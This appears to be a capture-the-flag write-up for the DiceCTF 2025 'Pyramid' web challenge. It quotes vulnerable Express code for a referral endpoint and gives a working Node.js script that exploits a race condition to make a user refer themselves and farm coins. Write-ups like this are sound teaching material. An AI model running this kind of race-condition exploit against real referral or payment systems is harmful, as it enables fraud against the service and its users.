Challenge Overview

Objective: Obtain 100,000,000,000 coins to purchase the flag by exploiting a race condition in a pyramid scheme referral system.

Vulnerability Analysis

The application contains a race condition vulnerability in the user registration endpoint (/new). The key issue lies in the response timing:

The server sends back the user token immediately in headers
The user and referrer entries are only created after the request ends
This timing difference allows us to manipulate the referral system

Here’s the vulnerable code:

1
app.post('/new', (req, res) => {
2
    const token = random()
3

4
    const body = []
5
    req.on('data', Array.prototype.push.bind(body))
6
    req.on('end', () => {
7
        const data = Buffer.concat(body).toString()
8
        const parsed = new URLSearchParams(data)
9
        const name = parsed.get('name')?.toString() ?? 'JD'
10
        const code = parsed.get('refer') ?? null
11

12
        // referrer receives the referral
13
        const r = referrer(code)
14
        if (r) { r.ref += 1 }
15

16
        users.set(token, {
17
            name,
18
            code,
19
            ref: 0,
20
            bal: 0,
21
        })
22
    })
23

24
  // Token is sent BEFORE we make the actual user !!111!!
25
    res.header('set-cookie', `token=${token}`)
26
    res.redirect('/')
27
})

Exploitation Steps

Initial Setup
- Create a new user by sending a request to /new
- Capture the user’s token from the response
Race Condition Exploitation
- Generate a referral code for our user using the /code endpoint
- Use our own referral code during registration
- Due to the race condition, we can refer ourselves
Completing the Exploit
- Create another user to trigger the referral reward
- Repeatedly cash out to accumulate coins

Exploit Code

1
const https = require("https");
2
const crypto = require("crypto");
3

4
const random = () => crypto.randomBytes(16).toString("hex");
5

6
let optionsProd = {
7
    hostname: "pyramid.dicec.tf",
8
    port: 443,
9
    path: "/new",
10
    method: "POST",
11
    headers: {
12
        "Content-Type": "application/x-www-form-urlencoded",
13
        "Keep-Alive": 5,
14
    },
15
    timeout: 5000,
16
};
17

18
const options = optionsProd;
19

20
const req = https.request(options, (res) => {
21
    console.log(res.statusCode);
22
});
23

24
req.on("socket", (socket) => {
25
    console.log("Socket Connected");
26

27
    socket.on("data", (data) => {
28
        console.log(data.toString());
29
        let token = data.toString().match(/token=([a-z0-9]+)/)[1];
30

31
        fetch(
32
            `https://${options.hostname}/code`,
33
            {
34
                headers: { cookie: `token=${token}` },
35
            },
36
        )
37
        .then((response) => {
38
            console.log(response.status);
39
            return response.text();
40
        })
41
        .then((text) => {
42
            let referralToken = text.match(
43
                /<strong>([a-z0-9]+)<\/strong>/,
44
            )[1];
45
            console.log("Referring token", referralToken);
46
            req.write(`refer=${referralToken}`);
47
            req.end();
48
        });
49
    });
50
});
51

52
req.write(`name=${random()}&`);

Post-Exploitation

After running the exploit:

Manually create a new user
Use the cash-out functionality repeatedly to accumulate the required coins
Purchase the flag once sufficient coins are obtained

Recap

fun exploit. iirc this service was not instanced and got DOS’d by a request flood just as i was trying to get the flag, which is always appreciated.

DiceCTF 2025 - Web - Pyramid